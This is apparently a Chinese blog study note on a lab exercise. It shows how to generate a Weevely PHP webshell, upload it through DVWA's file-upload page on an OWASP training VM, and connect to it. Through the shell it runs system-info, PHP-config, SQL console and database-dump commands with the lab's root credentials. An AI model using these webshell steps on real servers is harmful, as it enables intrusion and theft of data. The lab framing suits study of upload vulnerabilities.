kali学习笔记-06-Webshell文件上传漏洞使用

kali学习笔记-06-Webshell文件上传漏洞使用


一、使用weevely制作一句话木马脚本

在Kali Linux的终端中输入命令weevely,可以从错误提示中看到基本的使用方法。

输入以下命令来生成一句话木马:

weevely generate pass /home/kali/shell.php

这里指定的连接密码是pass,生成的文件是/home/kali/shell.php
enter description here

二、上传脚本到OWASP靶机

登录到OWASP靶机的网页上,设置DVWA Security的安全等级为low
enter description here
在页面上选择upload,点击Browse,选择我们刚刚创建的一名话木马脚本,上传成功后会提升上传的位置,如下图所示。
enter description here

三、连接靶机

在Kali的终端中输入如下命令进行连接

weevely http://192.168.48.141/dvwa/hackable/uploads/shell.php pass

在这个命令中,第一个参数是一句话木马上传之后的位置,根据上图中网页的网址和返回的目录格式,我们不难判断出,文件上传后的完成路径是http://192.168.48.141/dvwa/hackable/uploads/shell.php,第二参数是连接时所使用的密码。
enter description here

四、执行控制命令

测试使用ls命令查看文件。
enter description here
使用:system_info查看系统信息。
enter description here
使用audit_phpconf查看php配置信息。
enter description here
使用sql_console -u root -p owaspbwashow databases;命令查看系统的数据库信息。
enter description here
使用sql_dump -dbms mysql phpmyadmin root owaspbwa命令保存数据库。
enter description here

实验完毕。

五、参考文献

  1. WebShell文件上传漏洞.3
  2. webshell管理工具(菜刀、蚁剑、冰蝎、Weevely)​
  3. Kali Weevely使用教程
  4. kali linux之webshell
posted @ 2024-01-31 16:48  南宫二狗  阅读(477)  评论(0编辑  收藏  举报